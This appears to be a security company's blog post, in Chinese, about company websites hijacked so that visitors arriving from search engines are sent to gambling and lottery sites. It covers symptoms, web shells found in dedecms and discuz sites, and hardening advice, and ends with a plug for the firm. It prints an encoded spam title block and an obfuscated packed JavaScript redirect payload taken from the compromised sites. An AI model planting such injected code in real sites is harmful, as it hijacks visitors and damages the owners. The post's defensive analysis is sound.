最近一段時間，我們SINE安全公司一連線到數十個公司網站被跳轉到彩票，博彩網站上去，客戶反映從百度搜索網站進去，直接跳轉到彩票網站上，直接輸入網址沒有跳轉，導致客戶網站的流量急劇下滑，做的百度推廣跟搜狗推廣，都給彩票網站做廣告了，公司領導高度重視網站安全的問題，因為給公司的形象以及名譽帶來的損失太大了，我們安排安全技術人員對其網站進行全面的網站安全檢測，對網站存在的漏洞，以及木馬後門進行全面的清除與漏洞修復，安全加固。關於網站被跳轉到彩票、博彩網站的問題，整理一份詳細的處理過程，希望幫到更多遇到這種情況的站長，以及公司網站運營者。

網站被跳轉彩票網站問題分析

我們SINE安全跟公司網站負責人進行了詳細的伺服器資訊（伺服器IP 遠端埠 管理員賬號密碼、SSH埠、root賬號密碼），網站資訊包括FTP賬號密碼的對接，由安全部署部門技術對網站的程式碼以及伺服器系統進行縝密的安全檢測與分析。

在整體的安全檢測當中我們發現客戶的網站都存在網站木馬後門，包括php指令碼木馬,asp指令碼木馬，jsp指令碼木馬，我們通常叫大馬，可以對網站進行惡意篡改，上傳，改名，下載，等管理員的高許可權操作。出現網站被跳轉的客戶，採用的網站架構都是php+mysql架構，以及jsp+mysql架構，大多數用的是開源程式，像dedecms，織夢繫統，phpcms系統，discuz系統。

由於之前客戶網站總是被跳轉到彩票、賭博網站，客戶只是懂一些簡單的程式碼，只能通過篡改的首頁程式碼裡，找到惡意程式碼進行刪除，但是治標不治本，沒過幾天網站又被跳轉了，客戶經常為這些問題煩惱，每天提心吊膽的。其實問題的根本原因在於網站存在漏洞，以及伺服器安全沒有做好。我們SINE處理了成千上百的網站，總結的經驗來看，網站首頁被篡改的機率最大，都是篡改首頁的標題，描述，以及在首頁頂部新增一些加密的字元，如下圖所示：

<title>&#21271;&#20140;&#36187;&#36710;&#25237;&#27880;&#24179;&#21488;&#95;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#95;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#30331;&#24405;&#24179;&#21488;</title><meta name="keywords" content="&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#21382;&#21490;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#25237;&#27880;&#32593;&#31449;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#25237;&#27880;" />

以上程式碼就是被攻擊者新增的加密的標題與描述，解密後發現內容是什麼北京賽車，時時彩，PK10等賭博內容。還有一個被攻擊的特徵就是在首頁你會發現一段跳轉的程式碼，該程式碼是根據搜尋引擎的特徵來進行判斷跳轉，比如判斷客戶的訪問來路是通過百度搜索，360搜尋,搜狗搜尋來的會直接跳轉到彩票，賭博網站上去。如下程式碼：

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

跳轉到的彩票網站如下截圖：

再一個攻擊特徵就是網站在百度裡搜尋，出現紅色風險標識， 百度網址安全中心提醒您：該站點可能受到黑客攻擊，部分頁面已被非法篡改！ 紅色提示該百度風險。導致客戶開啟網站直接被百度攔截，如下圖所示：

百度網址安全中心提醒您：

該站點可能受到黑客攻擊，部分頁面已被非法篡改！ 檢視詳情

您正在訪問：http*******com/

該站點可能由於受到黑客攻擊，部分頁面已被非法篡改，可能會威脅到您的財產和資訊保安，建議您謹慎訪問。

站點（******.com/）發現的非法篡改頁面，可參考以下示例：

被黑網址快照1：********com/011E...

被黑網址快照2：********com/010S...

被黑網址快照3：********com/004G...

針對以上網站被跳轉攻擊的特徵，我們SINE對其進行全面的人工程式碼安全審計，以及網站漏洞檢測，網站木馬後門清理，發現dedecms網站存在sql注入漏洞，以及xss獲取管理員賬號cookies漏洞，discuz存在getshell漏洞，注入獲取管理員漏洞，discuz上傳繞過漏洞，針對上述漏洞我們進行了全面的修復，並做了網站安全部署，以及伺服器安全部署，網站檔案防篡改部署。

防止網站被跳轉的解決方法如下：

1.對伺服器目錄許可權的安全部署，對管理員賬號密碼加密，儘可能設定的複雜一些，數字+大小寫字母+特殊符號，對網站資料庫進行分配普通許可權賬號。

2.mysql資料庫預設埠3306，改為61116，並加入到埠安全策略，不對外開放，外網IP無法連線資料庫，只有本地127.0.0.1才能進行連線資料庫，以防止攻擊者惡意猜測。

3.對伺服器底層系統進行安全加固，包括遠端埠登入的安全驗證。

4.對網站程式碼進行整體的安全檢測，包括定期的升級網站程式原始碼，修復補丁以及網站漏洞。

5.也可以通過安全公司來解決，國內也就Sinesafe和綠盟等安全公司。